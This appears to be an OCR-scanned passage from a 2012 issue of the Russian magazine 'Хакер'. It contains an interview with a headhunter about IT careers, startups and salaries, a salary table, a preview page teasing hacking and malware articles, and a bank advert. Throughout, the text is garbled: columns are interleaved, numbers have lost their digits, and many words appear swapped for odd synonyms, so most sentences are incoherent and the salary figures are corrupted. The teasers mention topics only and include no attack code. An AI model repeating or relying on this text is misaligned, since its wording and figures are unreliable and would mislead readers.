счел меня каким-то

ные. Рекрутеру адски хоть головой об стену бейся накануне ни х добраться, оттого что такое? они закрыты

того, что моя персона разместила объяв ление что касается том, который

в недрах комnаний. К nримеру, во мэрии

:1

В результате

работает

000

ление. Когда наша сестра видим вакансию

в целях RuЬу-nрограммиста вслед

nрограмм истов, только что

пания его никак не найдет. Однако на обзорах

твоя милость прежде них достучишься? Как где раки зимуют

сотрудников, благодаря этому аюшки? наш брат безграмотный успевали раз­

по того человека, тот или иной достижимо сидит

бирать почту. Пи сьма падали такого типа лавиной,

равно кадит nочту кажинный день? Это nрактически

сколько огулом

невозможно.

си дел равно разбирал их неделю .

00 тысяч,

автор понимаем, который ради такие деньга ком­

пришлось немедленно комплектовать дополнительных

PRUFFI

000 тысяч

самое востребованное наnрав­

страшным спамером . А из л училось зто со временем

я ищем людей про Google.

невыгодный может

рублей, ежели некто невыгодный нисколько на­

Бывают дни, когда-никогда у меня «сносят» почту.

Gmail

Ruby

значение мень ше

всего только публичных людей.

почта, ибо который

выше, нежели на анали ­

зарnлат аналитики учиты вают занижен­ ные зарплаты, на результате зачем итоговые

цифры получаются недостоверными .

ГДЕ РАБОТАТЬ?

Количествооткликовоченьзависитотсамой

Каждый кракер знает такого а второ­

вакансии. В среднем иногда грубо

го . Он знает, который видишь этот- благоприятный програм­

Если ваша сестра можете следовать работатьврунет­

откликов, только поперед ходит равно впредь до обвалов. Летом была

мер , а этот- <<сачок» равно сносно создавать далеко не будет.

марш во рунет! Ни безраздельно квадрант отнюдь не хорош этак

работа управляющего на венчурный фонд­

Мы открываем вас вакансии- рекомендуйте

прогрессировать , вроде рунет равным образом

пришло рядом

своих друзей возьми сии вакансии . Это работа,

000 откликов вслед двушничек дня .

В среднем одну вакансию вает ото

00-60

PRUFFI

00 000 накануне 00 000 индивидуальность

но. То снедать автор издавна уж СМИ.

просматри­

ежеднев­

:1

IT

на целом.

а любая произведение должна бытийствовать оnлачена. Если

У крупных порталов завсегда жуткая недостаток

возлюбленная сделана усnешно равным образом пишущий сии строки устроили человека

людей, особенно технических сотрудников .

в области вашей рекомендации , ты да я вас заплатим. То поглощать потребитель nеречислил нам деньжата

Это богатые компании, равно у них кто в отсутствии ограничений

слыхать << на этом году пишущий сии строки воэьмем лишь только

из-за хантинг. Мы , отнюдь не раскрывая клиента, рассказали вас по отношению том, что-нибудь кушать такая

замечательная вакансия. Вы кого-то

00

чело­

век, да отнюдь не больше!>>. Они берут многих равным образом заин­ тересованы в всех, у кого принимать необходимый уровень комnетенции да адекватность.

nорекомендовали и, кабы здорово

Хантер малограмотный является носителем

сделали свою работу, nолучили

какой-то супертайны равным образом су­

мзда

перэкспертизы. Что давно нас

0000 евро.

Это

видимое дело нам сnраведливым.

представлял с лица общесредний

Если вам выбираете, нежели ударяться на рунете,

да у вам как например одну крошку символический склад ума- учитесь программить. Даже разве после

ваша милость невыгодный будете nрограммировать, достоинство пре­

хантер? Очень д орогой

Раньше следовать рекомендации

дакта [Pгoduct Manageг'al, некоторый на прошлом

костюм, суперджип- во се возьми расхититель оты.

последняя ганшпуг в колеснице невыгодный платил. Н относительно на результате нашего

Он приезжал, выкладывал ай пади к,

подхода что до гр омный кубатура данных оспе­

центов возьми

айфончик равно единаче

циалистах, в отношении профессионалах , вышел

сделаться со nрограммистами. Наnрим ер,

открыто .

аз многогрешный малограмотный смогу не без; ними договориться- все в равной степени кто

05

молескинчикав

равным образом говорил клиенту: <<Мои услу ги стоят

Мы заявили, аюшки? лажовый <<офигенной

00.

Почем у? Пот ому, что-нибудь вас сможете

nрограммер меня обманет.

три оклада кандидата, в силу того что который моя особа об­

ладаю офигенной эксnертизой».

сие умел, полноте много выше- nро­

:1

Он скажет: <<это

РRUFFiпервойсталауказыватьзарпла­

невозможно» alias <<чтобы сие сделать, нужно

твоя милость во топовом сегменте рунета. То глотать

двушник возраст >> [хотя на реале- три дня), равным образом ваш покорный слуга ему nо­

буквально: <<Э та положение из т оит рублей на месяц. Эта достаточно

эксперты для рынке- безвыездно вы. Для сего наша сестра

Через нас гоминидэ узнали в рассуждении величине компенса­

nридумали дополнение про социальных сетей

ций вице-nреэидентов nорталов: следственно nонят­

Рунет растянуто был закрытой системой, идеже

PRUFFI Fгiends [apps.facebook.com/pгuffi

но, в чем дело? тоn-менеджеры nолучают через

вершиной карьеры была произведение во Яндексе . То

03/158/201 0

рублеЙ >>.

верю. Если ваш брат разбираетесь во коде, вас склифосовский

экспертизы» малограмотный существует. На самом деле

ХАКЕР

000 тысяч

000 тысяч

000

тысяч

много легче. И вашей команде тоже.

031


.. COVERSTORY есть твоя милость шел-шел, равно становилось ясно: на конце

Смотрите бери вселенная из точки зрения «мобиль­

подходит насчёт зарплатах ото

концов тебе нужно настать во Яндекс, вчинить

ности». Доступ для интернету не без; компьютера

понятно- адски большая высота ответствен­

после работать- да интересах тебя сие склифосовский санаторий.

уходит на прошлое. Он, конечно, да далее достаточно

ности. У нас были такие требования через банков, ко ­

Яндекс был чем-то по-видимому Олимпа! Боги постоянно

употребляться к посещения интернет­

торые проходили, видимо, в области верхней границе

сидели на Яндексе. Они в частности от таким рас­

ресурсов, только уже год-два, да принтсервер

четом строили особый НR-бренд: весь сии гамаки,

перестанет существовать основным устройством

бесплатная яство равным образом другие бонусы. В коридорах

чтобы этого. Такими устройствами ста-

с годами можно' столкнуться Илью Сегаловича . При­

новятся мобильные равно планшетники.

глашение корпеть на Яндексе было равносиль­

Почему сие существенно со точки зрения

хотя тому, сколько ко тебе спустился Зеве равным образом погладил

карьеры? Потому, ась? програм-

тебя сообразно голове.

:1

И на Яндексе воистину

диапазона

000 000

рублей да вне . Это

-180-200 тысяч

рублей . Порталы

предлагали меньше- примерно

000-120

тысяч . Бывали требования равным образом через системных интеграторов, вслед за тем в среднем грубо

040

тысяч . Это цены согласно Москве.

мисты, равно продакт-менеджеры,

славно . Но сие давным-давно неграмотный единственная воз­

да всё, аюшки? сегодняшний день делается для того

можная конечная ступень карьеры.

мобильных платформ Andгoid, SymЬian,

КАРЬЕРА ПРОГРАММИСТА Сегодня самое красота

liOS, Windows

-быть программ истом.

Перестаньте вознамериваться во рамках рунета. Интер­

Phonel,- всё востребован но. И хорошенького понемножку

Вы понимаете альфа и омега бизнеса, азы

несть стал международным. В Россию пришли

востребован но. Зарплаты растут в соответствии с по всем статьям

профессии, вы полегчало всего делов взвихривать

по сию пору ведущие компании, а кто именно отнюдь не пришел, оный

направлениям.

да растить. Ведь бизнес- симпатия безвыгодный оборона сер­

придет во перемещение года. Мы искали сотрудников

вера. В основе нашего бизнеса лежит код.

интересах русского

Интернетстановитсявсёболеесегмен­

Это да лакомиться платформа. Поэтому, буде ваша сестра

с целью

тированным. Раньше ваша сестра могли воздвигать

умеете программить, ваша будущность хорэ

Facebook равным образом Google, автор искали Fouгsquaгe, на Linkedln равно многих других

компаний. Неважно, придет ли общество сама,

карьеру следующим образом: пока ваш покорнейший слуга

развертываться настолько, до чего ваш брат за­

наравне

РМ

хотите расширяться равным образом до какой степени этому помешает

Linkedln,

иначе купит какую-то другую ком­

IProduct manageri, грядущее занимаюсь

панию, в качестве кого сие ес Gгoupon. Прис утствие

маркетин гом , послезавтра- снова-здорово РМ,

будет! Поэтому погодите получи вселенная шире, глякось

подалее не вдаваясь в подробности перворазрядный редактор. Сей-

личная жизнь.

возьми мировые тренды- сие поможет тебе равно во

час, ко сожалению либо для счастью, всё в большинстве случаев

У программиста бесчисленно путей развития.

карьере во книга числе.

нельзя не узкая специализация. Тот а марке­

Первый- вам можете всю проживание вздыхать соответственно ком код.

тинг начинает делить бери кучу направлений:

В таком случае ваша сестра спервоначала становитесь nро­

Я малограмотный считаю, сколько некто разделен сверху нашу Пре­

во трафик, видишь контент, смотри брендинг равно приближенно

грамм истом, позже руководителем группы, по­

красную Страну да круглый прочий ад. Уверена,

далее. Надо облюбовать одно направление: разве

волюм руководите разработкой крупного портала.

в чем дело? человеку нужно присутствовать увлекательно трудиться

высшая оценка планирование взад ваша сестра могли бы бесконфликтно nерейти

Это буде ваша милость безграмотный хотите останавливаться. Или

равным образом любопытно расти, зачем дьявол лично властен предпочитать .

с сегмента брендинга на сегмент, связанн ый

дальнейший вариант- спервоначала ваша милость работаете про­

Зарплаты !именно во интернет-сектореl у нас

вместе с трафиком, так теперь сие хорош конец

граммистом, а впоследствии РМ'ом технологического

в тот же миг сравнимые, а чаще ажно выше, нежели

сложно.

nроекта. Затем делаете принадлежащий стартап или, коли

сверху Западе. Если человеку в тот же миг занятно по­ работать во центре игровой индустрии во

Zynga-

сие технологическое направленность вообще Винтернет nришло обилие безграмотный интернет­

сие понятно, да сие его выбор. И если бы симпатия уезжает

ных компаний. Например, МТС вместе с

по части приглашению

<<Связной» из

Zynga,

эдак в духе команда после этого

Enter.ru

Omlet.ru,

равным образом т. д.- их весть много.

выделяется во порознь взятый производство около портале, руководите сделано целым направлением. Класси­ ческий пример- Леша Терехов. Его моя особа нашла,

безвыгодный работает,- сие равным образом его альтернатива .

Они заинтересованы на привлечении

Не вижу на этом месте никакого предательства.

большого количества людей . Денег

риант- ваша сестра можете архи протяжно расти, а nотом

у них также много, они инда могут вы­

случаться в действительности евангелистом какого-либо

делять внутренние стартапы.

наnравления, как бы Гриша Бакунов на Яндексе.

PRUFFI

открыла стартапы по образу точку

развития. Но стартапы равно как нужно

когда-никогда возлюбленный был во маленьком стартапе. Третий ва­

Ну равно конечно, вас можете являться программистом,

разделять. С точки зрения найма

Не бойтесь сваливать учиться соответственно хоро­

подоспеть на технологическую компанию равно достигнуть

ты да я выделяем двум категории стар­

шим, интересным зарубежным про­

по ее гендиректора.

тапов: вместе с инвестициями перед $500 000 и побольше $500 000. Но сие только единолично

граммам. Вы постоянно сможете вернуться,

равно во качестве классического примера после этого

разве захотите. Но вернетесь сильнее

дозволено nривести Дмитрия Гришина, кто

изо критериев. Очень не фунт изюма вдолбить

востребованными. Более того, смо­

начинал во

молодому человеку, какой-никакой безвыгодный всякий раз

жете, быстрее всего, взвихрить тама денег

генерального директора

сам по себе ладно сие понимает, что-то далеко не нужно

да вернуться сейчас малограмотный на статусе наемно-

переться на плохую компанию: после этого его об­

го работника, а на статусе создателя

манут, ничему неграмотный научат

бизнеса. Классический

да общо хорошенького понемножку стресс,

nример-СергейФаге

чистилище да всё плохо.

равным образом его

Ostrovok.ru.

Таких

примеров достаточно много.

Шансов в тот же миг много! Ты можешь сортировать направления для развития. То есть, условно говоря, даже если тебя безвыгодный взяли на Яндекс

По сравнению из объемами с информационной безопасно­

-это безвыгодный развязка света . Если в ту же минуту

стью, незначительна да несерьезна.

тебе не терпится заниматься сообразно найму, ведь

Спрос бери специалистов, эанимающих­

дальше, возможно, захочется раскрыть

свое мастерство lи кабы сие достаточно интернет/IТ, мы, заново же, nоможем!. Потом, разве стартап

Molotok.ru,

ся информационной безопасностью, крайне мал. Но то, что-то спирт растет,- факт.

Это четвертый вариант,

а в ту же минуту занимает шутцпункт

Mail.ru.

ПРО ТРЕНДЫ Нынешние тренды таковы:

0. Ruby- ради

весна востребованность програм­

мистов выросла для

сильнее нежели на общего бизнеса ниша, связанная

:1

0.

06 %,

а зарплаты поднялись

00 %.

Всё, аюшки? связано из мобильными платформа­

ми,- да разработка, равным образом маркетинг.

0. 4.

Весь геймдев. Всё, аюшки? связано со

e-commerce,-

закачаешься с­

требованность да зарплаты вслед завершающий год выросли больше нежели получи

00% . Это

направленность

особенно востребован но.

Особенность зарождающегося тренда со­

короче удачным, ты, возможно, продашь торговля

игра стоит свеч во том, ась? визорий зарплат дозела

равно вернешься ко работе сообразно найму, да сделано решительно

велика: итог может варьироваться через весть

заговор

держи другом уровне . Мы показываем «объемную

жалкий предварительно всерьёз крупной. Когда

мобильные равным образом планшетные устройства начинают

картинку», а ради многих людей сие ужас имеет большое значение .

приходят подобные требования иэ банков, фраза

всё активнее применяться ради доступа для ин-

032

Наблюдается острая недостаток разработчи­

iOS

равным образом Andгoid. Бизнес почувствовал, ась?

ХАКЕР

03/158/2012


Интервью из ведущим хедхантером рунета

тернету чем стационарных компьютеров .

ни засада на Москву и, ко примеру, восполнять

равно скажут: <<Вот тебе количество во компании да не­

Отрасль оказалась ко этому отнюдь не готова ни во плане

расходы для съем жилья, же не дозволяется сказать, аюшки?

сколечко миллиардов, поди делай приватизированный

количества, ни на плане качества специалистов.

сие массовое явление. Однако такие случаи

НR-дивизион>> , ваш покорнейший слуга что, откажусь? Нет. Нужно

Результат- колкий развитие востребованности

учащаются.

пиндос матка , который подлунный мир без дальних слов полный шансов. Шанс

В какой угодно великоватый компании ввек поглощать люди,

являться активным, чтоб увеличить маза

Уменьшается понятность РНР-шников

которые ранее переросли ярус работы

этого. Хотя бы направлять благ.

равно Регl-программистов. Если ваша милость занимаетесь

по мнению найму. Это ценные сотрудники: от ними всё

равным образом зарплат мобильных разработчиков.

может показаться во первый встречный день, равным образом весть с гонором

Регl, вероятно, вы нужно подумать, бери какой­

хорошо, а покинуть их на наемных сотрудниках

В случае со блогом существенно пиндос мать, почто возлюбленный

ведь язычина переходить. Скорее всего, нате

уж неисполнимо . Не помогут никакие задачи

может корпеть на правах в тебя, эдак да против.

по образу позже Регl перевестись в «Рельсы>> проще,

да никакая зарплата, потому они хотят что­

Не приходится писать: << Я понятливый да всё знаю , а ваша сестра уны­

нежели нате С++ или — или

ведь свое. Димитрий Гришин с Mail.гu решил:

Ruby,

таково

Java .

лое говно! >> Нет! Благ может заключать даже если

наш брат сделаем особенный инкубаторий ради таких Интернет-сам по мнению себя тренд. Весь . Всё раз­

людей, дадим им оплачивание равным образом не­

летается во вкусе горячие пирожки .

обходимую инфраструктуру, дай тебе они

беда жесткую критику, хотя лишь только конкрет­

ную равным образом обоснованную. Например, можно написать что-нибудь небось <<этот интер­ фейс неточный благодаря чего равно потому,

могли обучаться своими проекта-

ми . Если у людей во конечном счете

ПРО ПЕЧЕНЬКИ

а корректный принуждён выглядеть так>> . Если близ этом призвать

ни аза отнюдь не получается, им паки

Помимо конкурентной зарплаты равно интересной

предлагают работу за найму. Если

работы, всё чаще предлагают податливый график.

но получается, Mail.гu Gгoup весь

Это значит, почто у тебя питаться некоторое количе­

могает взмыть этому проекту

ство <<присутственных дней>>, после которое твоя милость

максимально высоко. Компа-

вынужден отладить определенное контингент

ния дает многое, забирает

часов во офисе. Это важно, сие командная рабо­

положительно небольшую долю

та- твоя милость обязан вместе с кем-то путаться равно таково далее.

равным образом позволяет людям

близкий вариант, так бросьте вообще идеально. Вы должны показы­

вать себя профессионалом. Возможно, проект, который вы всего сколько критиковали, вас равным образом позовет.

Всё остальное минута твоя милость можешь нести записки и заботы идеже

выделывать вещь свое. Одним изо таких про­

Я самочки кончено беда сколько равным образом много раз хантила

хочешь. У тебя несложно глотать задача, которую твоя милость

ектов в тот же миг является служба микро­

сверху технических конференциях. Я

долженствует выполнять.

блогов Futubгa lfutubгa.com].

чуть-чуть что-нибудь понимаю после в технической секции, а вижу мальчиков из горящи­

Компании не откладывая числа учат равно отправляют на интересные стажировки. Раньше такого

ми глазами, задающих правильные

О ПОИСКЕ РАБОТЫ

вопросы. Докладывает, ко примеру,

весь малограмотный было: бедно кто именно был заинтересован

Если смертный ищет работу, автор этих строк сове­

Игорёк Сысоев, а мальчоночек изо зала за­

на системном обучении своих людей. Сейчас а

тую помещать реферат везде. Хуже

дает ему откровенно точный вопрос- я к нему подхожу, даю вертушка равно зову

компании совершенно чаще стали зазывать зару­

отнюдь не будет. Поиск работы- сие та но

бежных технологических наставник к внутренних

самая работа. К ней игра стоит свеч встретить

для нам держи тестирование. Даже кабы

выступлений . Это жуть сверхценно да важно.

ответственно.

аз многогрешный невыгодный вплоть до конца понимаю самоуправно вопрос,

На внешней конференции атомный разработ­

Не ленись составлять во компании на­

чик чаще всего делов закрыт

прямую. Составь роспись компаний ,

по мнению реакции докладчика аз многогрешный вижу, что-нибудь спирт

NDA (Non-disclosuгe

правильный.

agгeement- Соглашение в отношении неразглашении).

которые тебе интересны. Не нужно циркулировать

Все более-менее приличные зарплаты, по образу

Он не мудрствуя лукаво малограмотный имеет карт-бланш задавать многие

во всех отношениях стандартное письмо. Напиши , с чего

правило, закрыты определением «цена дого­

вопросы. Все я получай конференциях выглядим

твоя милость хочешь коптеть собственно на этой компании .

ворная». Есть причина- пользу кого них существует

в качестве кого дураки: шиш ценного сообщить никак не можем,

Например: << Я хочу во Островок.ру, благодаря этому в чем дело?

вилка. То кушать у

оттого в чем дело? сие может спутать планы нашему бизне­

считаю настоящий стартап архи перспективным,

утнапиштим установки <<мы нанимаем чувака следовать

су. Поэтому наша сестра говорим какие-то банальности.

ми нравится, в духе формируется его команда.

тысяч рублеЙ >>. Поэтому они решают: а давайте

HR

во таком случае пропал конкрет­

00

Когда такого учитель привозят на компанию, разра­

Вообще , ми интересна туристическая тема,

там видно будет чуваков на диапазоне через

ботчикам спокойнее- десятая спица ни ложки никак не укра­

равно пишущий эти строки люблю программировать сверху

тысяч. Если мастер полноте бог блестящий

дет. Они могут умиротворенно говорить, оценивать

нее всего, тебя позовут поговорить.

Ruby >>. Вероят­

-заплатим ему

тим

· какие-то сложные задачи .

Если твоя милость напишешь на

00.

050,

00

прежде

020

разве никак не очень-запла­

Вот во этой вилке они свободны.

00-15 компаний, в таком случае 0-4

Стартапы пришли от модой прочить опцио­

пригласят получи и распишись собеседование. Найти адреса

ны. Раньше обрести условия было архи слож­

нимало легко : они принимать для сайте компаний.

HR СОВЕ ТЫСТУДЕНТАМ Еще серия планирование взад считалось, почто

только да престижно. Их давали Яндекс, Mail.гu, и получи и распишись этом, наверное, допускается доделать список.

Принцип «я продаюсь единожды во три года» ранее

К сожалению, теперь получи и распишись толкучка входят стар­

малограмотный актуален. Мы продаемся всё время, ты да я всё-таки

Но разве твоя милость учишься во Бауманке равным образом nри этом ра­

тапы не раз от некоторым непониманием. Одно

-товар. Если будущие времена ко ми придут изо

ботаешь во Макдональдсе-это плохо. Не могу

Google

проходить равно делать одновременно- хорошо.

дело, разве твоя милость червон полет работал на Яндексе и получил кое-какой оп циан, да другое- три меся­ ца как бы покодил во Островке равно также получил

оп циан. Мне кажется, сие неправильно. Оп ци­ ан полагается бытийствовать бог ценной вещью, иначе и достоинство самой компании а именно падает. Большое наличность компаний теперь ищут сотрудников на регионах. Ищут вроде для того фи­ лиалов, этак да прямо для того удаленной работы. Иногда компании готовы перебросить сотруд-

ХАКЕР

03/158/ 0012

СЕГОДНЯ САМОЕ ПРЕКРАСНОЕ- БЫТЬ ПРОГРАММ ИСТОМ.

Bbl ПОНИМАЕТЕ ОСНОВЫ

БИЗНЕСА,ОСНОВЫПРОФЕССИИ,ВАСЛЕГЧЕ ВСЕГО ПОДНИМАТЬ И РАСТИТЬ 033


COVERSTORY сказать, сколько автор этих строк зто осуждаю, как-никак ситуации

ший от тартап. Хороший безвыгодный во плане успешности

П отому, что-то лю д да н е предста во ляю т, каков

у людей бывают разные, равно по временам сие не мудрствуя лукаво

из точки зрения бизнеса - потенциального

бери самом д еле-еле интернет. Они далеко не пре д ставляют,

урок выживания.

работодателя сие недовольно интересует. Крупным

в чем дело? нате самом д еле-еле нужно, а в свою очередь далеко не со ­

размеряют собственные силы да не без; р едс т ва.

компаниям значительно превыше испить на вы

Работать кайфовый пора учебы до чрезвычайности не грех

человека, какой мыслит на правильном

н е в угоду денег, а чтобы выбора т ого, нежели зани ­

направлении да умеет курить фимиам руками.

м а т ьс моя особа на ~удущем . Это отличное время, воеже

Порталам нужно всё, сколько связано

поступить вместе с направлением дальнейшей

от техноло г иями, видео, мобильны-

Н е хва т ает насчёт п ыта, св мы зей, те рп е н ия, денег да только п ро ч е г о. Д е л ай т е стар тап , пока учитесь,- автор сих строк на акробат воздуха заметим.

ми платформами, социальными

деятельности.

Идите подвизаться на большую, серьезную компанию, идеже вы

сетями, - сие основные вещи,

Д алеко малограмотный весь со первого раза нащупывают,

которые востребованы денно и нощно

зачем добро бы т. Е сли, суще студентом, твоя милость меня­

равно всеми.

научат качественному про­ граммингу, качественному

маркетингу. В ы пр осто

ешь работу в один из дней во три месяца- сие невыгодный страшно. Ты подсознательно нащуnываешь, аюшки? хочешь . Что

Че м может присутствовать красивый

самое важное : ко последнему курсу твоя милость должен,

первы й стартап? П ока

поработав во разных местах равно пройдя стажи­

ваша милость учитесь, скажем так , во Бауманке, вам

отнюдь не со н изу. Вы постой т е изо того же Ян д екса, M ail.гu, изо какой-либо следовать п а д­

посмо т рите наинтер н ет не вз гля д ом срам ента,

ровку на разных компаниях, определиться, кем

как бы делаете, ваша сестра пробуете. Вы смо­

твоя милость хочешь бы т ь. Услов н что до говоря, «маркетинг

трите да понимаете, что такое? вы интересно,

утнапиштим компа н ии, ведь сделал ть све р ху. Пл крючкотвор вас

-не мое, верстка- никак не мое, а вишь производство

набиваете первые ши ш ки.

обрастете связями, на е д ь л юбой п что касается р та л

дает ужас хорошую на озможность об ­

-да!>>. Вот сие достаточно хорошо. Не н адо насчёт г ромного количества тусовок

вытягиваться связями.

К об для ончанию учебы имеет важное значение повысить свою

кажется стартаперски х. Люди дальше безвыгодный ра­

те х ничес для ую компетенцию . Или, продукто­

ботают, они ходят равно трындят ни что касается нежели .

У вы будут связи, у вам короче по­

вую, разве твоя милость РМ, тож маркетин г овую, разве

Ц енность таких людей нулевая.

нимание, вам обрастете костяком

Меня пугают люди, которые во

друг, моя персона вместе с ним пивцо 3 л >>. Б тройка е т д ругое:

команды. Н е полноте во в рассуждении т э т в отношении г о: «Э т что до моего

специализируешься бери маркети н ге.

09 парение

Ес л ич еловекправильнодумаетии м еет

заявляют: «Я мастер соответственно формиро­

<<Это офигенный программ ис т, мы из ним

бэкграунд , лучше г овс~получится .Затакими

ванию бренда!>>

работал на одном отд еле, автор сош л ись

вместе с ним сверху общей теме, равным образом нам призанятно

людьми гоняются крупные порталы да старта­

пы, набирающие обороты, - все!

общаться>>. У вам поя во ится какое-то коли­

О СТАРТАПАХ

свербеж т закачаешься не без; во об дн ых дене г- нынешний ч штукарь во р у н е т е

Н е ст оит что касается со обенно ра от вместе с ч ит ы вать получи стажиров­

Большинство стартаповна рынке- унылое

важнецки зарабаты во ают. Вам если т лег ч е около ­

ко у во большо й компании. Все порталы пред­

г ов н что до . Именно посему у нас крата во полгода вы­

нять инвестиции, когда вас скажете: << Я три го д а

лагают стажировки, так сверху деле безграмотный куда

ходит отнесение к категории

«30 лучших

команд стар­

любят занимать стажеров, что-то около вроде от ними

тапав Рунета>>. Зачем ты да я его выпускаем?

лакомиться чисто ёбаный проекп>. Вам, ско р ее , д аду т сии

программ да л почту на Я н дексе, а в настоящее время у меня

нельзя не варганить равно вычислять

Затем, который без дальних разговоров жуть бессчетно «nены>>,

деньги, благодаря чего ась? у во мастак йес т ь какой-то п по части дт на е р ж ­

про них недостающий работоспособный ден ь , что такое? скудно

все же базар токмо развивается. И куда

д енный что касается п ыт равно вы, веро ятн о, д ейс твит е л ь н по части

кого устраивает .

существенно разъяснить молодому человеку, ко­

несколько со д елае т е.

торый малограмотный постоянно непосредственно недурственно сие понимает,

У большинства порталов не долго думая вместе с у ще­

почто малограмотный нужно переться во плохую компанию :

Я считаю, который приманка стартапы нужно деять по­

не без; твуют школы да у ч енические програ м ­

вслед за тем обманут, ничему далеко не научат равным образом не выделяя частностей

сле

м ы . Например, у Яндекса снедать Школа

короче «стресс, эреб равно всё плохо>> .

анализа данных. Если ладно пройдешь отучишься, тебе со немалый ве­

ста р тапы. Хотя нет, безграмотный так. Д е­

роятностью предложат работу.

лайте стартапы, так безграмотный связывай ­ те со ними свою основную карьеру.

Фактиче не без; ки ни у кого, кто именно начи н ал

от ебянаолимпиа д а х попрогра м ми­

Google- со временем

нашел т ь специальные

подразделения к студентов . Если твоя милость

недурственно себя показал, тебе махом а сделают предложение.

Мало компаний ради сие берется. У н акробат воздуха принимать р яд программ, во фолиант числе платная п ро г рамма

со льготными расценками чтобы стартапо во . Е сть и бесплатная, солидарно не без; Gгeenfield Pгoject. Мы всё в одинаковой мере изначально оце н равным образом во аем, насколь ­

Можно что до ч ень недурственно изъявить

Mail.гu,

прежде поработав.

Мы адски не раз ищем людей в целях стартапов. Скажу страшное- безвыгодный делайте

такую программу да важно

рованию . Они проводятся на Яндексе,

08-29 лет,

от вою карьеру со стартапов, нуль

н е полу ч илось . Нужно составлять гением уров ­ ня Цукерберга, так тут да никакие мировоззрение

ко старта п живучий. Е сли стар т ап ставка л ь­ ный, хотя у него в эту пору п рос ведь н е т д е н ег, ч т об ы держи м платить, наша сестра пиарим вакансию следовать ностро своих

возможнос т ей.

к вы общий никак не действуют. Спасибо, что-нибудь

вам прямо-таки есть!

:1

Стартапы для семенной стадии- сие нет слов многом дело хантеров. Потому ась? угроза возьми этапе реа­

Ст удент, для а для н равным образом странно, мо жет предпринять хоро -

Почему никак не п олучаю т ся первые стартапы?

лизации идеи минимален .

Главный тускарора ко завсегда связан от командой. Сделают сии народище замысел иначе нет, смогут alias

ДАЛЕКО НЕ ВСЕ С ПЕРВОГО РАЗА НАЩУПЫВАЮТ, ЧЕГО ХОТЯТ. ЕСЛИ, БУДУЧИ

СТУДЕНТОМ, ТЫ МЕНЯЕШЬ РАБОТУ РАЗ В ТРИ МЕСЯЦА- ЭТО НЕ СТРАШНО.

безграмотный смогут? Оценить всё сие держи старте, хеджи­ ровать сии риски нечеловечески во ажно. П оэ т ому, когд а старта п ы шимоза ь ко в ч разве зарож д атьс мы ,

агентство

PRUFF I было

п ер во ым, который п в отношении ш ел

исчислять всё сие вместе с точки зрения л ю д ей. М ы очень бог не обидел сделали во этом смыс л е, поэтому,

конечно, нам было призанятно пройти старта ­ пы изнутри. :К:

ХАКЕР

03/158/2012


Зарплаты специалистов [1 сентября-1 декабря 0011 года] РАЗРАБОТЧИКИ Профессия \опыт работы

0-5 пет

0-10 пет

бопее10 пет

00 000- 00 000

00 000- 050 000

070 000 - 050 000

050 000 - ...

00 000- 00 000.

00 000- 080 000 .

080 000- 050 000.

050 000 - ...•

0-5 пет

0-10 пет

бопее10 пет

00 000 - 00 000

00 000 - 00 000

00 000 - 000 000

000 000 - ...

Unix,Linux admin

00 000 - 00 000 20 000 - 00 000 •

00 000 - 00 000 60 000 - 00 000 •

00 000- 010 000 90 00 0 - 010 000 .

010000- ••• 130 000 - 050 000 .

DBA (Огасlе, MySql, Postgгes равно

'о ооо

- 00 ооо 40 000 - 00 000 •

00 000 - 030 000 80 000 - 030 000.

030 000- 050 000 130 000 - 050 000 .

050 000- 080 000 150 000 - 080 000 *

Team

leadeг

0-3

возраст

Разработчик около ппатформы Andгoid,

iOS

Разработчик Регi/РНР

Разработчик

Ruby on Rails

СИСТЕМНЫЕ АДМИНИСТРАТОРЫ Профессия \опыт работы Ведущий

Windows

0-3

годы

правитель

т.д.) Руководитепь группы системных администраторов

GAME

00 000- 050 000

050 000- 080 000

080 000- 050 000

00 000- 050 000.

050 000- 080 000 .

080 000- 050 000 .

0-5 пет

0-10 пет

бопее10 пет

ИНДУСТРИЯ

Профессия

0 исследование работы

0-3

годы

Неб-разработчик

Flаsh-разработчик

Game

ргоduсег

ЦВЕТ

-

востребованность осталась в прежнемуровне

востребованность увеличилась не в экой мере нежели получи 00 %

востребованность увеличилась сильнее нежели нате 00 %

востребованность уменьшилась меньше нежели получай 00 %

ХАКЕР 03/158/2012

• Заработная плата прошлого квартала

035


Preview

03 страницы журнала в одной

полосе.

Тизер некоторых статей .

PCZONE 38

ВКИТАЙЗАПОКУПКАМИ? tотни тысяч товаров до самым низким ценам - идеже до данный поры твоя милость найдешь такое

предложение, буде малограмотный на китайских интернет-магазинах? Такого кто в отсутствии даже наеВау!Близостькпроизводствуи огромная состязание играют получи руку

покупателям. Из Китая дозволяется следовать казать самого линия да сообразно самой низкой цене. При этом тебе невыгодный нужно морочиться с оплатой доставки - весь с д ержки берет на себя продаве ц . Мы подготовили длятебяобэорпровере н ныхторговых площадок, гд е приобести интересую­ щий предмет торговли твоя милость можешь из минимальным

риском. Обсудим я да важные советы по он лайн - пок у п ка м не без; уче книжка специфики поставщиков с Поднебесной.

взламывание

PCZONE

ПРОВЕРКА НА ПРОЧНОСТЬ

ФРЕЙМВОРКДЛЯХАКЕРА

0CANCRACKIT!

Наша задача-автоматизированно

Анализ структуры сайта, брутфорс форм,

Управлениеправительственнойсвязи

постановить САРТС Н А. Как сие изготовить минус

разведка уязвимостей, лесоэксплуатация дырок,

Великобританиинедавноопубликовало

реализации фильтров, слож н ых нейрон­

объезд 005 - только что малая доза того, н а который

задачки на хакеров. Мы решили их по­

ных сетей да ОСR-систем?

способны плагины проектаwЗаf.

вглядываться да на ходу решили.

взламывание

ФАЛЬШИВЫЕ СМ(

Партерка-при м фактически ка-подписка- взгляд изнутри об том, наравне устроены равным образом получи нежели

зарабатывают многочисленные СМС­ лохотроны.

036

MALWARE

ВЕСЕЛАЯ ТРОЙКАБУТКИТОВ Самыетехнологичныеугрозы

0011

возраст во

веселых картинках. Кто с разработчиков малвари инструмент ивил антивирусных аналити­

засада свыше всего?

МАЛВАРЬДЛЯ МОБИЛЬНЫХ ОКОШЕК Вирусовдля

Windows Phone 0.5 доколе

нет. Но появятся ли они на будущем?

Разбираемся умереть и неграмотный встать внутренностях новой мобильной ОС ото Microsoft.

ХАКЕР

03/158/2012


А АnьФа·Банк

Оформить дебетовую или — или кредитную «Мужскую карту» позволительно во отделениях ОАО «Альфа-Банка», а беспричинно но заказав до телефонам:

(495) 029-2222 на Москве 08-800-333-2-333 во регионах России (звонок бесплатный) или сверху сайте

www.mancard.ru

(game}land


PCZONE

Романя Володин (biohedge!Ogmail.coml

